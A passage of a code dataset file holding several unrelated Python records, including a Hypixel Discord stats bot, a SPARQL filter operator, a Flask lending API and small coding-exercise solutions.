playerRank[\"rank\"] == 'Youtuber':\n colour = self.utils.rank[\"RED\"][0]\n elif \"rankPlusColor\" in playerJSON:\n colour = self.utils.rank[playerJSON[\"rankPlusColor\"]][0]\n else:\n colour = 0x55FFFF\n if playerSession and 'gameType' in playerSession:\n footer = f'Currently in a {playerSession[\"gameType\"].title()} game'; onlineStatus = True\n else:\n footer = self.bot.footer\n if onlineStatus:\n footer_url = 'https://image.ibb.co/h9VNfq/image.png'\n else:\n footer_url = 'https://image.ibb.co/hwheRV/image.png'\n embeds = {}\n emb = {\n 'embed': {\n 'title': f'{\"[\" + playerRank[\"prefix\"] + \"]\" if playerRank[\"prefix\"] else \"[\" + playerRank[\"rank\"] + \"]\"} {playerName}' if playerRank[\"rank\"] != 'Non' else playerName,\n 'url': f'https://hypixel.net/player/{playerName}',\n 'description': '',\n 'color': colour\n },\n 'footer': {\n 'text': footer,\n 'icon_url': footer_url\n },\n 'thumbnail': 'https://image.ibb.co/fdaKBV/BUgpGKB.png',\n 'pages': {\n '0': [\n {'description': 'Crazy Walls - **Overall**'},\n {'name': 'Coins', 'value': f'{playerTC[\"coins\"] if \"coins\" in playerTC else 0:,}'},\n {'name': 'Win Streak', 'value': playerTC[\"win_streak\"] if 'win_streak' in playerTC else 0},\n {'name': 'Kills', 'value': playerTC[\"kills\"] if 'kills' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"deaths\"] if 'deaths' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"wins\"] if 'wins' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"losses\"] if 'losses' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"kills\"] if \"kills\" in playerTC else 0) / int(playerTC[\"deaths\"] if \"deaths\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': f'{int(playerTC[\"wins\"] if \"wins\" in playerTC else 0) / int(playerTC[\"losses\"] if \"losses\" in playerTC else 1):.2f}'},\n ],\n '1': [\n {'description': 'Crazy Walls - **Solo Normal**'},\n {'name': 'Kills', 'value': playerTC[\"crazywalls_kills_solo\"] if 'crazywalls_kills_solo' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"crazywalls_deaths_solo\"] if 'crazywalls_deaths_solo' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"crazywalls_wins_solo\"] if 'crazywalls_wins_solo' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"crazywalls_losses_solo\"] if 'crazywalls_losses_solo' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"crazywalls_kills_solo\"] if \"crazywalls_kills_solo\" in playerTC else 0) / int(playerTC[\"crazywalls_deaths_solo\"] if \"crazywalls_deaths_solo\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': f'{int(playerTC[\"crazywalls_wins_solo\"] if \"crazywalls_wins_solo\" in playerTC else 0) / int(playerTC[\"crazywalls_losses_solo\"] if \"crazywalls_losses_solo\" in playerTC else 1):.2f}'},\n ],\n '2': [\n {'description': 'Crazy Walls - **Solo Lucky**'},\n {'name': 'Kills', 'value': playerTC[\"crazywalls_kills_solo_chaos\"] if 'crazywalls_kills_solo_chaos' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"crazywalls_deaths_solo_chaos\"] if 'crazywalls_deaths_solo_chaos' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"crazywalls_wins_solo_chaos\"] if 'crazywalls_wins_solo_chaos' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"crazywalls_losses_solo_chaos\"] if 'crazywalls_losses_solo_chaos' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"crazywalls_kills_solo_chaos\"] if \"crazywalls_kills_solo_chaos\" in playerTC else 0) / int(playerTC[\"crazywalls_deaths_solo_chaos\"] if \"crazywalls_deaths_solo_chaos\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': f'{int(playerTC[\"crazywalls_wins_solo_chaos\"] if \"crazywalls_wins_solo_chaos\" in playerTC else 0) / int(playerTC[\"crazywalls_losses_solo_chaos\"] if \"crazywalls_losses_solo_chaos\" in playerTC else 1):.2f}'},\n ],\n '3': [\n {'description': 'Crazy Walls - **Team Normal**'},\n {'name': 'Kills', 'value': playerTC[\"crazywalls_kills_team\"] if 'crazywalls_kills_team' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"crazywalls_deaths_team\"] if 'crazywalls_deaths_team' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"crazywalls_wins_team\"] if 'crazywalls_wins_team' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"crazywalls_losses_team\"] if 'crazywalls_losses_team' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"crazywalls_kills_team\"] if \"crazywalls_kills_team\" in playerTC else 0) / int(playerTC[\"crazywalls_deaths_team\"] if \"crazywalls_deaths_team\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': f'{int(playerTC[\"crazywalls_wins_team\"] if \"crazywalls_wins_team\" in playerTC else 0) / int(playerTC[\"crazywalls_losses_team\"] if \"crazywalls_losses_team\" in playerTC else 1):.2f}'},\n ],\n '4': [\n {'description': 'Crazy Walls - **Team Lucky**'},\n {'name': 'Kills', 'value': playerTC[\"crazywalls_kills_team_chaos\"] if 'crazywalls_kills_team_chaos' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"crazywalls_deaths_team_chaos\"] if 'crazywalls_deaths_team_chaos' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"crazywalls_wins_team_chaos\"] if 'crazywalls_wins_team_chaos' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"crazywalls_losses_team_chaos\"] if 'crazywalls_losses_team_chaos' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"crazywalls_kills_team_chaos\"] if \"crazywalls_kills_team_chaos\" in playerTC else 0) / int(playerTC[\"crazywalls_deaths_team_chaos\"] if \"crazywalls_deaths_team_chaos\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': f'{int(playerTC[\"crazywalls_wins_team_chaos\"] if \"crazywalls_wins_team_chaos\" in playerTC else 0) / int(playerTC[\"crazywalls_losses_team_chaos\"] if \"crazywalls_losses_team_chaos\" in playerTC else 1):.2f}'},\n ]\n },\n # 'image': f'https://visage.surgeplay.com/full/256/{playerName}'\n }\n embed = discord.Embed(**emb[\"embed\"])\n embed.set_thumbnail(url=emb[\"thumbnail\"])\n for page in range(len(emb[\"pages\"])):\n for field in emb[\"pages\"][str(page)]:\n if 'description' in field:\n embed.description = field[\"description\"]\n else:\n embed.add_field(**field)\n if 'image' in emb:\n embed.set_image(url=emb[\"image\"])\n embed.set_footer(text=emb[\"footer\"][\"text\"], icon_url=emb[\"footer\"][\"icon_url\"])\n embeds[page] = embed\n del embed\n embed = discord.Embed(**emb[\"embed\"])\n embed.set_thumbnail(url=emb[\"thumbnail\"])\n return embeds\n\ndef setup(bot):\n h = CrazyWalls(bot)\n bot.add_cog(h)\n","repo_name":"HypixelBot/bot","sub_path":"hypixel/crazywalls.py","file_name":"crazywalls.py","file_ext":"py","file_size_in_byte":8987,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"14988666946","text":"#!/usr/bin/env python3\n\n# This file is part of PyCeed.\n#\n# PyCeed is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, version 3 of the License.\n#\n# PyCeed is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\t See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with PyCeed. If not, see .\n\nimport feedparser\nfrom feedgen.feed import FeedGenerator\n\nout_feed = FeedGenerator()\n\nurl = 'http://www.courantpositif.fr/feed/'\nd = feedparser.parse(url)\nprint(\"~~ %s ~~\" % d.feed.title)\nout_feed.title(d.feed.title)\nout_feed.subtitle(d.feed.subtitle)\nout_feed.id(d.feed.get(\"id\", \"no id\"))\nout_feed.updated(d.feed.updated)\n\nfor e in d.entries:\n\tprint(\" * [%s] %s\" % (e.published, e.title))\n\tout_entry = out_feed.add_entry()\n\tout_entry.title(e.title)\n\tout_entry.published(e.published)\n\tout_entry.updated(e.updated)\n\tout_entry.id(e.id)\n\tout_entry.summary(e.summary)\n\tfor c in e.content:\n\t\tout_entry.content(content=c.value, type=c.type) #, src=c.base\n\tfor l in e.links:\n\t\tprint(\"\t > [%s] %s\" % (l.rel, l.href))\n\t\tout_entry.link(link=l)\n\nprint(\"\\n\\n%s\" % out_feed.atom_str(pretty=True))\n","repo_name":"cadrian/pyceed","sub_path":"test/poc/test-feeds.py","file_name":"test-feeds.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"3971607945","text":"import matplotlib\nfrom matplotlib import pyplot as plt\n\nfrom .simulation import Result\n\n# global settings for plots\nplt.rcParams.update({\n 'axes.labelsize': 'large',\n 'axes.labelweight': 'bold',\n 'axes.titlesize': 'medium',\n 'axes.titleweight': 'bold',\n 'legend.fontsize': 'small',\n 'xtick.labelsize': 'large',\n 'ytick.labelsize': 'large',\n 'figure.facecolor': '1.00'\n })\n\n\n# consistent plotting styles\ncolors = plt.rcParams['axes.prop_cycle'].by_key()['color']\nkwargs_data_plot = {'marker': 's', 'linestyle': '--', 'linewidth': 1}\nkwargs_data = {'marker': 's', 'linestyle': '--', 'linewidth': 1, 'capsize': 3}\nkwargs_sim = {'marker': None, 'linestyle': '-', 'linewidth': 2}\n\n\ndef add_line(xid, yid, ax, s, color='black', label='', xf=1.0, kwargs_sim=kwargs_sim, **kwargs):\n \"\"\"\n\n :param xid:\n :param yid:\n :param ax:\n :param s: namedtuple Result from simulate\n :param color:\n :return:\n \"\"\"\n kwargs_plot = dict(kwargs_sim)\n kwargs_plot.update(kwargs)\n\n if isinstance(s, Result):\n x = s.mean[xid]*xf\n\n ax.fill_between(x, s.min[yid], s.mean[yid] - s.std[yid], color=color, alpha=0.3, label=\"__nolabel__\")\n ax.fill_between(x, s.mean[yid] + s.std[yid], s.max[yid], color=color, alpha=0.3, label=\"__nolabel__\")\n ax.fill_between(x, s.mean[yid] - s.std[yid], s.mean[yid] + s.std[yid], color=color, alpha=0.5, label=\"__nolabel__\")\n\n ax.plot(x, s.mean[yid], '-', color=color, label=\"sim {}\".format(label), **kwargs_plot)\n else:\n x = s[xid] * xf\n ax.plot(x, s[yid], '-', color=color, label=\"sim {}\".format(label), **kwargs_plot)\n\n\n\n","repo_name":"matthiaskoenig/liverfunction","sub_path":"liverfunction/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31895674631","text":"\"\"\"\nCreated on Mar 03, 2014\n\nImplements the Xfilter operator.\nThe intermediate results are represented in a queue.\n\n@author: Maribel Acosta Deibe\n\"\"\"\n\nfrom multiprocessing import Queue\nfrom DeTrusty.Sparql.Parser.services import Filter, Expression, Argument\nimport datetime\nimport operator\n\nunary_operators = {\n '!': operator.not_,\n '+': '',\n '-': operator.neg,\n 'bound': lambda a: len(a) > 0,\n 'str': str\n}\n\nlogical_connectives = {\n '||': operator.or_,\n '&&': operator.and_\n}\n\narithmetic_operators = {\n '*': operator.mul,\n '/': operator.truediv,\n '+': operator.add,\n '-': operator.sub,\n}\n\ntest_operators = {\n '=': operator.eq,\n '!=': operator.ne,\n '<': operator.lt,\n '>': operator.gt,\n '<=': operator.le,\n '>=': operator.ge\n}\n\ndata_types = {\n 'integer': (int, 'numerical'),\n 'decimal': (float, 'numerical'),\n 'float': (float, 'numerical'),\n 'double': (float, 'numerical'),\n 'string': (str, str),\n 'boolean': (bool, bool),\n 'dateTime': (datetime, datetime),\n 'nonPositiveInteger': (int, 'numerical'),\n 'negativeInteger': (int, 'numerical'),\n 'long': (int, 'numerical'),\n 'int': (int, 'numerical'),\n 'short': (int, 'numerical'),\n 'byte': (bytes, bytes),\n 'nonNegativeInteger': (int, 'numerical'),\n 'unsignedLong': (int, 'numerical'),\n 'unsignedInt': (int, 'numerical'),\n 'unsignedShort': (int, 'numerical'),\n 'unsignedByte': (bytes, bytes), # TODO: this is not correct\n 'positiveInteger': (int, 'numerical')\n}\n\nnumerical = (int, int, float)\n\n\nclass Xfilter(object):\n\n name = \"FILTER\"\n\n def __init__(self, filter):\n self.input = Queue()\n self.qresults = Queue()\n self.filter = filter\n\n def execute(self, left, dummy, out, processqueue=Queue()):\n # Executes the Xfilter.\n self.left = left\n self.qresults = out\n # print \"self.filter.expr.op\", self.filter.expr.op\n # print \"self.filter.expr.left\", self.filter.expr.left\n # print \"self.filter.expr.right\", self.filter.expr.right\n # Apply filter tuple by tuple.\n tuple = self.left.get(True)\n\n # print 'tuple ', tuple\n\n while (tuple != \"EOF\"):\n (res, _) = self.evaluateComplexExpression(tuple, self.filter.expr.op, (self.filter.expr.left, None),\n (self.filter.expr.right, None))\n if res:\n self.qresults.put(tuple)\n\n tuple = self.left.get(True)\n # print 'tuple ', tuple\n\n # Put EOF in queue and exit.\n self.qresults.put(\"EOF\")\n # return\n\n def __repr__(self):\n return str(self.__class__) + \">> FILTER (\" + str(self.filter.expr.left) + \" \" + str(\n self.filter.expr.op) + \" \" + str(self.filter.expr.right) + \")\"\n\n # Base case.\n def evaluateOperator(self, operator, expr_left, expr_right):\n # print \"operator in Filter\", operator, expr_left, expr_right, type(expr_left), type(expr_right)\n if (operator in logical_connectives):\n # print \"Case: logical connectives\"\n return self.evaluateLogicalConnective(operator, expr_left, expr_right)\n elif operator in arithmetic_operators:\n # print \"Case: arithmetic operator\", operator\n return self.evaluateAritmethic(operator, expr_left, expr_right)\n elif (operator in unary_operators):\n # print \"Case: unary_operators\"\n return self.evaluateUnaryOperator(operator, expr_left)\n elif (operator in test_operators):\n # print \"Case: test\"\n return self.evaluateTest(operator, expr_left, expr_right)\n\n # Inductive case.\n def evaluateComplexExpression(self, tuple, operator, left, right):\n (expr_left, type_left), (expr_right, type_right) = left, right\n # Case 1: Inductive case binary operator OP(Expr, Expr)\n res = None\n if isinstance(expr_left, Expression) and isinstance(expr_right, Expression):\n # print \"Case 1\"\n res_left = self.evaluateComplexExpression(tuple, expr_left.op, (expr_left.left, type_left),\n (expr_left.right, type_right))\n res_right = self.evaluateComplexExpression(tuple, expr_right.op, (expr_right.left, type_left),\n (expr_right.right, type_right))\n\n res = self.evaluateOperator(operator, res_left, res_right)\n # print \"res:\", res\n # print \"\\n--------------------------\"\n\n # Case 2: Inductive case binary operator OP(Expr, Arg)\n elif isinstance(expr_left, Expression) and isinstance(expr_right, Argument):\n # print \"Case 2\"\n res_left = self.evaluateComplexExpression(tuple, expr_left.op, (expr_left.left, type_left),\n (expr_left.right, type_right))\n if expr_right.constant:\n res_right = expr_right.name\n else:\n res_right = self.extractValue(tuple[expr_right.name[1:]])\n res = self.evaluateOperator(operator, res_left, res_right)\n\n # Case 3: Inductive case binary operator OP(Arg, Expr)\n elif isinstance(expr_left, Argument) and isinstance(expr_right, Expression):\n # print \"Case 3\"\n # if expr_left.name[1:] in tuple:\n if expr_left.constant:\n res_left = (expr_left.name, str)\n else:\n res_left = self.extractValue(tuple[expr_left.name[1:]])\n res_right = self.evaluateComplexExpression(tuple, expr_right.op, (expr_right.left, type_left),\n (expr_right.right, type_right))\n res = self.evaluateOperator(operator, res_left, res_right)\n # else:\n # return None\n # Case 4: Inductive case unary operator OP(Expr, None)\n elif isinstance(expr_left, Expression):\n # print \"Case 4\"\n res_left = self.evaluateComplexExpression(tuple, expr_left.op, (expr_left.left, type_left),\n (expr_left.right, type_right))\n res = self.evaluateOperator(operator, res_left, None)\n\n # Case 5: Base case binary operator OP(Arg, Arg)\n elif isinstance(expr_left, Argument) and isinstance(expr_right, Argument):\n # print \"Case 5\", expr_left.constant, expr_right.constant, tuple[expr_left.name[1:]], expr_right.name\n if expr_left.constant:\n res_left = expr_left.name, str\n else:\n res_left = self.extractValue(tuple[expr_left.name[1:]])\n if expr_right.constant:\n res_right = (expr_right.name, str)\n else:\n res_right = self.extractValue(tuple[expr_right.name[1:]])\n # print \"res left, right \", res_left, operator, res_right\n res = self.evaluateOperator(operator, res_left, res_right)\n # print res\n\n # Case 6: Base case unary operator OP(Arg, None)\n elif isinstance(expr_left, Argument):\n # print \"Case 6\"\n if expr_left.constant:\n res_left = expr_left.name\n else:\n res_left = self.extractValue(tuple[expr_left.name[1:]])\n res = self.evaluateOperator(operator, res_left, None)\n else:\n pass\n return res\n\n '''\n evaluateEBV: calculates whether an argument is an Effective Boolean Value (EBV)\n according to the definition in the SPARQL documentation \n See: http://www.w3.org/TR/sparql11-query/#ebv\n\n input: val -- an argument\n return: (isEBV, EBV) -- both of Python type bool\n '''\n\n def evaluateEBV(self, casted_val, type_val):\n\n # Handles python data types.\n if (isinstance(casted_val, bool)):\n return (True, casted_val)\n if (isinstance(casted_val, numerical)):\n if (casted_val == 0 or casted_val == 'nan'):\n return (True, False)\n else:\n return (True, True)\n\n # Rule 1\n if ((type_val == bool) and (casted_val != 'true') and (casted_val != 'false')):\n return (True, False)\n elif ((type_val == 'numeric') and not (isinstance(casted_val, numerical))):\n return (True, False)\n\n # Rule 2\n if (type_val == bool):\n if (casted_val == 'true'):\n return (True, True)\n elif (casted_val == 'false'):\n return (True, False)\n\n # Rule 3\n if (type_val == str):\n if (len(casted_val) == 0):\n return (True, False)\n else:\n return (True, True)\n\n # Rule 4\n if ((type_val == 'numeric')):\n if (casted_val == 0 or casted_val == 'nan'):\n return (True, False)\n else:\n return (True, True)\n\n # Rule 5: The error type should be raised by the evaluators.\n return (False, None)\n\n def evaluateUnaryOperator(self, operator, left):\n (expr_left, type_left) = left\n\n if (operator == '+' and isinstance(expr_left, numerical)):\n return (expr_left, type_left)\n\n elif (operator == '-' and isinstance(expr_left, numerical)):\n return (unary_operators[operator](expr_left), type_left)\n elif (operator == 'bound'):\n return (unary_operators[operator](expr_left), type_left)\n elif (operator == 'str'):\n return (unary_operators[operator](expr_left), str)\n elif (operator == '!'):\n (isEBV, ebv) = self.evaluateEBV(expr_left, type_left)\n if (isEBV):\n return (unary_operators[operator](ebv), type_left)\n else:\n raise SPARQLTypeError\n else:\n raise SPARQLTypeError\n\n def evaluateLogicalConnective(self, operator, left, right):\n (expr_left, type_left), (expr_right, type_right) = left, right\n\n (isEBV_left, ebv_left) = self.evaluateEBV(expr_left, type_left)\n (isEBV_right, ebv_right) = self.evaluateEBV(expr_right, type_right)\n\n # print \"in evaluateLogicalConnective\", expr_left, isEBV_left, ebv_left\n # print \"in evaluateLogicalConnective\", expr_right, isEBV_right, ebv_right\n\n if (isEBV_left and isEBV_right):\n return (logical_connectives[operator](ebv_left, ebv_right), bool)\n\n elif (isEBV_left):\n res = logical_connectives[operator](ebv_left, 'Error')\n if (res == 'Error'):\n raise SPARQLTypeError\n else:\n return (res, bool)\n\n elif (isEBV_right):\n res = logical_connectives[operator](ebv_right, 'Error')\n if (res == 'Error'):\n raise SPARQLTypeError\n else:\n return (res, bool)\n\n def evaluateTest(self, operator, left, right):\n if left and right:\n (expr_left, type_left), (expr_right, type_right) = left, right\n else:\n print(\"Exception: left or right operand None.\", left, right)\n raise Exception\n if ((type(expr_left) == type(expr_right)) or (\n isinstance(expr_left, numerical) and isinstance(expr_right, numerical))):\n\n return (test_operators[operator](expr_left, expr_right), bool)\n else:\n try:\n if isinstance(expr_left, numerical):\n ltyp = type(expr_left)\n expr_right = ltyp(expr_right)\n elif isinstance(expr_right, numerical):\n rtype = type(expr_right)\n expr_left = rtype(expr_left)\n return (test_operators[operator](expr_left, expr_right), bool)\n except:\n print(\"SPARQLTypeError - in Xfilter\")\n raise SPARQLTypeError\n\n def evaluateAritmethic(self, operator, left, right):\n (expr_left, type_left), (expr_right, type_right) = left, right\n # print \"evaluateAritmethic(), \", expr_left, expr_right, operator, type(expr_left), type(expr_right), expr_right, type_left, type_right\n\n if (isinstance(expr_left, numerical) and isinstance(expr_right, numerical)):\n return (\n arithmetic_operators[operator](expr_left, expr_right), type_left) # TODO: implement the cases with types\n elif (isinstance(expr_left, numerical) and isinstance(expr_right, str)):\n expr_right = int(expr_right)\n expr_left = int(expr_left)\n # print expr_right,expr_left , (arithmetic_operators[operator](expr_left, expr_right), type_left)\n return (\n arithmetic_operators[operator](expr_left, expr_right), type_left) # TODO: implement the cases with types\n else:\n raise SPARQLTypeError\n\n def extractValue(self, val):\n pos = val.find(\"^^\")\n # Handles when the literal is typed.\n if (pos > -1):\n for t in data_types.keys():\n if (t in val[pos:]):\n (python_type, general_type) = data_types[t]\n if (general_type == bool):\n return (val[:pos], general_type)\n else:\n return (python_type(val[:pos]), general_type)\n else:\n return (str(val), str)\n\n\nclass SPARQLTypeError(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n pass\n","repo_name":"SDM-TIB/DeTrusty","sub_path":"DeTrusty/Operators/AnapsidOperators/Xfilter.py","file_name":"Xfilter.py","file_ext":"py","file_size_in_byte":13518,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"70436762614","text":"def add(num1: int, num2: int) -> int:\n num1: str = str(num1)\n num2: str = str(num2)\n if len(num1) < len(num2):\n num1 = num1.zfill(len(num2))\n else:\n num2 = num2.zfill(len(num1))\n my_sum: str = ''\n for i in zip(num1, num2):\n my_sum += str(sum(int(j) for j in i))\n return int(my_sum)","repo_name":"ZaytsevNS/python_codewars","sub_path":"7KYU/add_v3.py","file_name":"add_v3.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"72533759414","text":"print('Lab 11: Make Change')\n\n### Version 1 ###\n\nprint('Welcome to the Change Maker 5000 (tm)')\n\nwhile True:\n\n dollar = float(input('Enter a dollar amount: $'))\n\n quarters = dollar//.25\n dollar %= .25\n dimes = dollar//.10\n dollar %= .10\n nickels = dollar//.05\n dollar %= .05\n pennies = dollar//.01\n \n print(f'Your change is {quarters} quarter(s), {dimes} dime(s), {nickels} nickle(s), {pennies} penny(ies).')\n \n # allow the user to choose whether they want to play again\n play_again = input('Would you like to make more change? yes/no: ')\n\n valid_yes = ['y', 'yes', 'yep']\n valid_no = ['n', 'no', 'nope']\n valid_choices = valid_yes + valid_no\n\n while play_again not in valid_choices:\n print(f'You chose an invalid selection: {play_again}')\n play_again = input('Would you like to make more change? yes/no: ')\n\n if play_again in valid_no:\n print('Thanks for the Business!!')\n break\n\n elif play_again in valid_yes:\n continue\n\n#----------------------------------------------------------------------------#","repo_name":"lisamonique/-PDX-Code-Guild---Python-Fullstack-Solutions-.","sub_path":"Labs/Lab_11_Make_Change.py","file_name":"Lab_11_Make_Change.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12907637214","text":"from flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required, current_identity\nfrom models.lender import LenderModel\nfrom models.user import UserModel\nfrom models.application import ApplicationModel\nfrom werkzeug.security import safe_str_cmp\n\nclass Lender(Resource):\n \n parser = reqparse.RequestParser()\n parser.add_argument('id',\n type=int,\n required=False,\n help=\"This field is not required\"\n )\n parser.add_argument('name',\n type=str,\n required=True,\n help=\"This field cannot be blank.\"\n )\n parser.add_argument('lendercode',\n type=str,\n required=True,\n help=\"This field cannot be blank.\"\n )\n \n @jwt_required()\n def get(self):\n code = current_identity.lendercode\n lender = LenderModel.find_by_lendercode(code)\n if lender:\n return lender.json(), 200\n return {'Message': \"No lender with lendercode '{}' was found\".format(code)}, 404\n \n @jwt_required()\n def post(self):\n data = Lender.parser.parse_args()\n if not safe_str_cmp(current_identity.lendercode, '000'):\n return {\"Message\": \"You do not have the rights to create lenders. Please consult a member of (000) Admin Lender.\"}, 401\n if len(data['lendercode']) != 3:\n return {\"Message\": \"Lendercode for a new lender must be 3 numbers.\"}, 400\n lender = LenderModel.find_by_lendercode(data['lendercode'])\n if lender:\n return {\"Message\": \"A lender with that code already exists. Please use a lender that have a non-conflicting code.\"}, 304\n \n lender = LenderModel(data['name'], data['lendercode'])\n lender.save_to_db()\n return {\"Message\": \"Lender created successfully.\"}, 201\n \n @jwt_required()\n def put(self):\n data = Lender.parser.parse_args()\n if not safe_str_cmp(current_identity.lendercode, '000'):\n return {\"Message\": \"You do not have the rights to create lenders. Please consult a member of (000) Admin Lender.\"}, 401\n lender = LenderModel.find_by_id(data['id'])\n if lender is None:\n return {\"Message\": \"No lender with id '{}' exists. Please create the lender before saving.\".format(data['id'])}, 304\n if safe_str_cmp(lender.lendercode, '000'):\n return {\"Message\": \"Lender 000 cannot be modified.\"}, 403\n if not safe_str_cmp(lender.lendercode, data['lendercode']):\n return {\"Message\": \"Cannot change the lendercode of an already created lender.\"}, 400\n \n lender.name = data['name']\n lender.save_to_db()\n return {\"Message\": \"Lender updated.\"}, 200\n \n @jwt_required()\n def delete(self, lendercode):\n if not safe_str_cmp(current_identity.lendercode, '000'):\n return {\"Message\": \"You do not have the rights to create lenders. Please consult a member of (000) Admin Lender.\"}, 401\n lender = LenderModel.find_by_lendercode(lendercode)\n if lender is None:\n return {\"Message\": \"No lender with lendercode '{}' exists.\".format(lendercode)}, 304\n if safe_str_cmp(lendercode, '000'):\n return {\"Message\": \"Lender 000 cannot be deleted.\"}, 403\n \n try:\n UserModel.delete_all_by_lendercode(lendercode)\n ApplicationModel.delete_all_by_lendercode(lendercode)\n lender.delete_from_db()\n return {\"Message\": \"Lender and all related users/applications were deleted successfully.\"}, 200\n except RuntimeError:\n return {\"Message\": \"Problem deleting. Please try again. Error: \" + ReferenceError.message}, 500\n \nclass Lenders(Resource):\n @jwt_required()\n def get(self):\n lenders = LenderModel.grab_all_lenders()\n return {'Lenders': lenders}, 200","repo_name":"btvanhooser/simple-lending-api","sub_path":"resources/lender.py","file_name":"lender.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27827141093","text":"#!/usr/bin/env python\n\"\"\"\nGiven a positive integer n, write a function that returns true if it is a\nperfect square and false otherwise. Don’t use any built-in math functions like\nsqrt. Hint: Use binary search!\n\nExamples:\n\n$ perfectSquare(25)\n$ true\n\n$ perfectSquare(10) $ false \n\"\"\"\n\nfrom hypothesis import given\nimport hypothesis.strategies as st\n\ndef perfect_square(n: int):\n assert n > 0\n lo = 1\n while 4 * lo * lo < n:\n lo *= 2\n # lo is now the highest power of 2 strictly less than sqrt(n)\n hi = lo\n while hi * hi < n:\n hi *= 2\n # hi is now the lowest power of 2 at least as big as sqrt(n)\n if hi * hi == n:\n return True\n assert lo * lo < n < hi * hi\n while hi - lo > 1:\n mid = (lo + hi) // 2\n print(lo, mid, hi)\n midmid = mid * mid\n if midmid < n:\n lo = mid\n elif midmid == n:\n return True\n else:\n hi = mid\n return False\n\n\ndef test_example1():\n assert perfect_square(25) == True\n\n\ndef test_example2():\n assert perfect_square(10) == False\n\n\n@given(st.integers(1))\ndef test_squares(n):\n assert perfect_square(n * n) == True\n\n\n@given(st.integers(1))\ndef test_squares_plus_one(n):\n assert perfect_square(n * n + 1) == False\n\n\n@given(st.integers(1))\ndef test_squares_times_three(n):\n assert perfect_square(n * n * 3) == False\n","repo_name":"pozorvlak/cassidoo","sub_path":"2020/2020-11-23_perfect_square/perfect_square.py","file_name":"perfect_square.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27689270608","text":"'''\nGiven n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai).\nn vertical lines are drawn such that the two endpoints of the line i is at (i, ai) and (i, 0).\nFind two lines, which, together with the x-axis forms a container, such that the container contains the most water.\n'''\n\ndef maxArea(height):\n\n def area(height, start, end):\n return height * (end - start)\n\n true_max = 0\n\n i, j = 0, len(height) - 1\n\n while i != j:\n true_max = max(true_max, area(min(height[i], height[j]), i, j))\n if height[i] < height[j]:\n i = i + 1\n else:\n j = j - 1\n\n return true_max\n \nprint(maxArea([1,8,6,2,5,4,8,3,7]))","repo_name":"ta05/LeetCode-Practice","sub_path":"11. containerWithMostWater.py","file_name":"11. containerWithMostWater.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74337264054","text":"import sys\nimport os\nimport shiki_parcer as parcer\nimport Database\nimport kinopoisk_parcer\nimport subprocess\nfrom subprocess import Popen, PIPE\n\nmults = []\nfilms = []\nserial = False\n#scanpath = \"/home/howe251/test\"\nscanpath = \"/var/www/films/films/assets/filmy\"\n#/var/www/films3/films/assets/filmy\n\n\ndef find_series_mult(k, i, mult):\n \"\"\"\n Поиск серий к мультикам отсканированным в check_files_mkv_mult\n :type k: list\n :param k: Список файлов\n :type i: int\n :param i: Индекс в списке\n :type mult: str\n :param mult: Путь к папке с мультами\n :return: Имя, список серий, путь к папке/файлу, индекс\n \"\"\"\n #print(k[i])\n if mult in k[i]:\n directory = k[i].replace(mult, '')\n if k[i].count('/') > scanpath.count('/') + 2:\n serial = True\n pathid = directory.find('/')\n path = directory[0:pathid]\n name = remove(directory[0:pathid].replace(\".\", \" \"))\n else:\n path = directory\n name = 